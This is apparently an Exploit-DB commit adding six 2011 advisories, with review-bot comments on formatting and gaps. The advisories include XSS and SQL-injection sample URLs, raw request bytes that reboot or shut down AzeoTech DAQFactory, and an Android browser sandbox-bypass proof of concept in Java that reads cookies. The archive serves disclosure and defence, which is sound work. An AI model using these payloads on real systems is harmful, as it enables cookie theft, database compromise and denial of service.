Update: 2015-02-08

6 new exploits
Offensive Security 2015-02-08 08:36:08 +00:00
parent 783274a13b
commit 4b9d336b5c
7 changed files with 90 additions and 0 deletions

@ -32447,3 +32447,9 @@ id,file,description,date,author,platform,type,port
36003,platforms/php/webapps/36003.txt,"Curverider Elgg <= 1.7.9 Multiple Cross Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0 36003,platforms/php/webapps/36003.txt,"Curverider Elgg <= 1.7.9 Multiple Cross Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0
36004,platforms/multiple/remote/36004.txt,"Skype <= 5.3 'Mobile Phone' Field HTML Injection Vulnerability",2011-08-01,noptrix,multiple,remote,0 36004,platforms/multiple/remote/36004.txt,"Skype <= 5.3 'Mobile Phone' Field HTML Injection Vulnerability",2011-08-01,noptrix,multiple,remote,0
36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin 'tab' Parameter SQL Injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin 'tab' Parameter SQL Injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
36006,platforms/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 Browser Sandbox Security Bypass Vulnerability",2011-08-02,"Roee Hay",multiple,remote,0
36007,platforms/multiple/dos/36007.txt,"AzeoTech DAQFactory Denial of Service Vulnerability",2011-06-24,"Knud Erik Hojgaard",multiple,dos,0
36008,platforms/php/webapps/36008.txt,"Gilnet News 'read_more.php' SQL Injection Vulnerability",2011-07-11,Err0R,php,webapps,0
36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank 'b' Parameter Cross Site Scripting Vulnerability",2011-08-03,Err0R,php,webapps,0
36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL 'sayfa.asp' Cross Site Scripting Vulnerability",2011-08-03,Err0R,asp,webapps,0
36011,platforms/asp/webapps/36011.txt,"Ataccan E-ticaret Scripti 'id' Parameter SQL Injection Vulnerability",2011-08-03,Err0R,asp,webapps,0
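
Review bot: the `date` column in the added rows does not follow the ids: 36007 carries 2011-06-24 and 36008 carries 2011-07-11, sitting between rows dated 2011-08-02 and 2011-08-03. If `date` is the original disclosure date rather than the import date, say so next to the header (`id,file,description,date,author,platform,type,port`), since this commit is dated 2015-02-08 and anyone sorting or filtering on that column will otherwise misread these entries. All six new rows also have `port` set to 0, including the `remote` entry 36006; document whether 0 means "not applicable" or "unknown".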

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48969/info
BESNI OKUL PORTAL is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/[PATH]/sayfa.asp?islem=1&AltKategoriNo=42&AltKategoriAdi=<script>alert(document.domain)</script>
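
Review bot: the advisory text never names the affected parameter or an affected version; the parameter appears only in the sample URL, where `AltKategoriAdi` carries the script. State both in the prose so a reader triaging this entry can match it against their own deployment without parsing the URL. The CSV row that mentions 'sayfa.asp' has the same gap.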

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48970/info
Ataccan E-ticaret scripti is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/name.asp?id=[SQLInjection]
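
Review bot: the sample URL uses `name.asp`, and nothing in the text says whether that is the real script name or a stand-in like the `[SQLInjection]` marker beside it. The CSV row for Ataccan E-ticaret Scripti names only the 'id' parameter, so the affected page is not identified anywhere in this commit. Mark `name.asp` explicitly as a placeholder or name the actual file, and add the affected version if it is known.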

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/48955/info
AzeoTech DAQFactory is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the application to crash, denying service to legitimate users.
Versions prior to DAQFactory 5.85 are vulnerable.
The following exploit requests are available:
preamble:
"\x01\x00\x09\x00CPassword\x00"
reboot:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
shutdown:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"

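Review bot: the description and the request labels disagree on impact: the text says attackers can "cause the application to crash", while the listed requests are labelled `reboot` and `shutdown`, which reads as commands being accepted rather than the service crashing. Clarify which it is, because that changes how a defender rates the issue. The one remediation fact present, "Versions prior to DAQFactory 5.85 are vulnerable", would be easier to act on if it were phrased as the version to upgrade to.
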
@ -0,0 +1,36 @@
source: http://www.securityfocus.com/bid/48954/info
Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox.
Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.
Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected.
public class CasExploit extends Activity
{
static final String mPackage = "com.android.browser";
static final String mClass = "BrowserActivity";
static final String mUrl = "http://target.domain/";;
static final String mJavascript = "alert(document.cookie)";
static final int mSleep = 15000;
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
startBrowserActivity(mUrl);
try {
Thread.sleep(mSleep);
}
catch (InterruptedException e) {}
startBrowserActivity("javascript:" + mJavascript);
}
private void startBrowserActivity(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
res.setData(Uri.parse(url));
startActivity(res);
}
}
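
Review bot: this file is indexed as `36006.java` in the CSV but opens with four lines of plain advisory prose outside any comment, so tooling will not treat it as Java source; wrap the `source:` line and the description in a block comment. In the constants, `mUrl` ends with a doubled semicolon (`"http://target.domain/";;`), and the empty `catch (InterruptedException e) {}` swallows the interrupt silently. The text lists Android 2.3.4 and 3.1 as vulnerable but gives no fixed version, which is the detail a reader checking device exposure needs.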

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48966/info
Gilnet News is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/[PATH]/read_more.php?id=[Injection]
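
Review bot: the placeholder convention is inconsistent across this commit: this entry uses `[Injection]` where the Ataccan entry uses `[SQLInjection]`. Pick one form. The vulnerable parameter (`id` in the sample URL) is also not named in the text or in the CSV description, which gives only 'read_more.php', and no affected version is stated.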

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48967/info
mt LinkDatenbank is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/mt_linkdb/links.php?b=%22%3E%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E
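
Review bot: the sample URL here is percent-encoded, while the BESNI OKUL PORTAL entry in the same commit shows its payload as raw `<script>` markup; use one form across entries so log searches and signatures built from these files behave consistently. The prose also repeats the generic impact paragraph without naming the `b` parameter (it appears only in the CSV description and the URL) or an affected version.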